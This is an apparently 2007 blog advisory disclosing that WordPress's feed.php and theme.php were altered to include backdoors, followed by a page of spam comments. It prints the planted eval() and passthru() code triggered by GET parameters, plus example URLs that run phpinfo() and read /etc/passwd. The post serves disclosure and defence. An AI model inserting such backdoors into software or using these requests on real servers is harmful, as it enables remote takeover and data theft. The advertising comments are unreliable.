While assessing the security of WordPress, a popular blog creation software, I have discovered that it's source code has recently been compromised by a third party in order to enable remote command execution on the machines running affected versions. The compromised files are wp-includes/feed.php and wp-includes/theme.php.
The following code has been added:
in wp-includes/feed.php
function comment_text_phpfilter($filterdata) {
eval($filterdata);
}
...
if ($_GET["ix"]) { comment_text_phpfilter($_GET["ix"]); }
in wp-includes/theme.php
function get_theme_mcommand($mcds) {
passthru($mcds);
}
...
if ($_GET["iz"]) { get_theme_mcommand($_GET["iz"]); }
this would enable remote command execution on machines running compromised versions, for example
http://wordpressurl/wp-includes/feed.php?ix=phpinfo();
http://wordpressurl/wp-includes/theme.php?iz=cat /etc/passwd
I have discovered this vulnerability on Friday, March 2nd 2007 and contacted WordPress about it straight away. They reacted promptly by disabling downloads until further investigation. Later they determined that ony one of two servers has been compromised and that the two files mentioned above are the only ones changed.
It seems that the above files were changed on Feb 25th, 2007, so if you downloaded WordPress between Feb 25th, 2007 and Mar 2nd 2007 it is possible that you are running a compromised version, so be sure to check for the above code.
About Wordpress
"WordPress is a state-of-the-art semantic personal publishing platform with a focus on aesthetics, web standards, and usability. What a mouthful. WordPress is both free and priceless at the same time."
Thanks to Ryan Boren of WordPress for quick response and his feedback regarding this issue.
411 comments:
«Oldest ‹Older 401 – 411 of 411The flexibility of hiring remote software developers allows companies to tap into a global talent pool, ensuring access to diverse skill sets and expertise.
hire remote software developers
WordPress source code compromised to enable remote code execution is really impressive and informative psst. Great job!
Corporate Videos
Commercial Video Production
Remote Production
Vertical Content
Animation Video Production
Documentary Production
Event coverage and broadcast solution
Music Videos
Remote Production and Broadcast Solution
Virtual Production Studio Mobile
Virtual Reality and Metaverse Production
We appreciate your efforts keep up the good work.
Signature Transportation Group
Signature Luxury Transportation Group
Signature Luxury Transportation Group
Nice post! Discover the ancient art of yoga and deepen your practice with a 200-hour Yoga Teacher Training in Rishikesh, the spiritual heart of India. Immerse yourself in the serene surroundings of the Himalayas while gaining comprehensive insights into yoga philosophy, asanas, meditation, and teaching methodologies. This transformative program offers a unique blend of traditional teachings and modern approaches, guided by experienced instructors.
Visit CMOLDS a website development company dubai offering great expertise and skills in web and app development and design.
Mind Flow Harmony is the top teacher training facility in Rishikesh and the best yoga school for beginners. We provide 100-hour, 200-hour, and 300-hour yoga teacher training programs in Rishikesh in addition to yoga nidra and anatomy courses.
100 Hour Yoga Teacher Training In Rishikesh
200 Hour Yoga Teacher Training In Rishikesh
300 Hour Yoga Teacher Training In Rishikesh
Explore how the Pharmaceutical Industry integrates ESG principles for sustainable growth with Venus Global Technology
ESG In Pharmaceutical Industry
nice blog
web design company in faridabad
Amazing approach to safeguarding data integrity and privacy, setting new standards in cyber security companies!
Transforming PL/SQL ETL to SnapLogic magic—bridging data with seamless efficiency!
Addressing the WordPress vulnerability promptly and comprehensively is critical to safeguarding your website, its data, and your users from any type of potential harm. Proactive security measures and vigilance are always essential for maintaining a secure online presence. boat rental abu dhabi
Post a Comment